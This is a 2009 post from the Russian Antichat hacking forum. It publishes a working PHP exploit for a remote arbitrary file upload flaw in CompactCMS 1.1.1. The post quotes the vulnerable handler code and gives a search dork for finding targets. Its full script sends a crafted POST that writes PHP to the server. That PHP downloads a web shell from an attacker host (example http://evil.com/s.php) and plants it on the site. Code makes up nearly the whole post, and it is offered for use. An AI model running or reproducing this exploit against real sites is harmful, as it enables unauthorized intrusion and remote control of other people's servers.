ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

CompactCMS Remote Arbitrary File Upload Exploit
  #1  
Старый 09.04.2009, 09:25
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию CompactCMS Remote Arbitrary File Upload Exploit

CompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit


PHP код:
<?php

/**
 * @Product: MMIX - CompactCMS
 * @Version: 1.1.1
 * @Site: CompactCMS.nl 
 * @Dork: "© 2009 CompactCMS"  
 * @Found by: Dimi4  
 * @Date: 8.04.2009
 * @Greetz: antichat, UASC[http://uasc.org.ua]
 *  @Bug Function [admin\handler.inc.php] [50-62 lines] :
 *  */ 
/////////////////////////////////////////////////////////////////////
## $name         = htmlentities($_GET['file']);                      #
## $content    = $_POST['content'];                                    #
## $filename    = "../content/".htmlentities($_GET['file']).".php"; #
##                                                                  #
##    if (is_writable($filename)) {                                   #
##        if (!$handle = fopen($filename, 'w')) {                     #
##             echo "[ERR105] ".$sw_err02." (".$filename.").";        #
##             exit;                                                  #
##        }                                                           #
##        if (fwrite($handle, $content) === FALSE) {                  # 
##            echo "[ERR106] ".$sw_err03." (".$filename.").";         #
##            exit;                                                   #
##        }                                                           #
 ////////////////////////////////////////////////////////////////////   
error_reporting(0);
set_time_limit(0);

function 
http_send($host$packet)
{
    if ((
$s socket_create(AF_INETSOCK_STREAMSOL_TCP)) == false)
      die(
"\nsocket_create(): " socket_strerror($s) . "\n");

    if (
socket_connect($s$host80) == false)
      die(
"\nsocket_connect(): " socket_strerror(socket_last_error()) . "\n");

    
socket_write($s$packetstrlen($packet));
    while (
$m socket_read($s2048)) $response .= $m;

    
socket_close($s);
    return 
$response;
}

function 
help()
    {
    global 
$argv;
    echo 
"\n\n[?] Usage: ".$argv[0]." <host> <path> <shell>.\n\n";
    echo 
"[?][?] Ex: ".$argv[0]." www.host.com /ct/ http://evil.com/s.php\n\n";
    echo 
"[?] Usage: ".$argv[0]." <host> <path> <shell> <login> <pass>.\n\n";
    echo 
"[?][?] Ex (Basic AUTH): ".$argv[0]." www.host.com /ct/ http://evil.com/s.php admin 12345\n\n";
    die();
    }

if (
$argv[1] == "") {
    
help();
    die();
    }
    
$host $argv[1];
$path $argv[2];
$shell $argv[3];
$login $argv[4];
$pass $argv[5];
$tmpshell "1123";
$shellname "manpage.php";

$payload .= "action=Save changes&content=<?php copy('{$shell}', './{$shellname}'); unlink('{$tmpshell}.php'); header('Location:{$shellname}');?>\r\n\r\n";

echo(
"
------------------------------------------------------------------
\tCompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit
------------------------------------------------------------------\n\n"
);
echo(
"**\t Coded by Dimi4, greetz Antichat\n\n");
echo (
"[+] Connecting to {$host}...\n");

$packet  "POST http://{$host}/{$path}/admin/handler.inc.php?file={$tmpshell} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "prama: no-cache\r\n";
if(!empty(
$login) && !empty($pass))
{
    
$packet .= "Authorization: Basic ".base64_encode($login.':'.$pass)."\r\n";
}
$packet .= "Accept: text/html\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\n\n";
$packet .= $payload;
$response http_send($host$packet);
//echo ($response);

if (preg_match("/WWW-Authenticate/i"$response))
{
        die(
"[-] Authorization Required. Set Login And Password or CORRECT them please!\n");
}
else
{
    echo (
"[+] Sending Payload...\n");
    echo (
"[+] Downloading shell...\n");
    if(!
file_get_contents($shell))
    {
            echo (
"\t[!] Warning! Can't Download shell!\n");
            
$warning "Maybe";
    }
    echo (
"\t[+]$warning Successful! Check: http://{$host}{$path}content/$tmpshell.php\n");
    die();
}

?>
Вложения
Тип файла: rar compactcms.rar (1.5 Кб, 4 просмотров)

Последний раз редактировалось Dimi4; 09.04.2009 в 16:32..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблемы с Записью Cd-R Nova Аппаратное обеспечение 17 14.03.2009 17:59
Большой выбор Torrents.ru !JaX! Разное - Покупка, продажа, обмен 3 14.12.2008 19:25
ZoneAlarm remote Denial Of Service exploit & ZoneAlarm Remote DoS eXploit ground_zero Защита ОС: вирусы, антивирусы, файрволы. 4 01.12.2006 15:32
Нужна консультация (Intranet Chat) ty3ik Чаты 3 30.04.2006 19:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ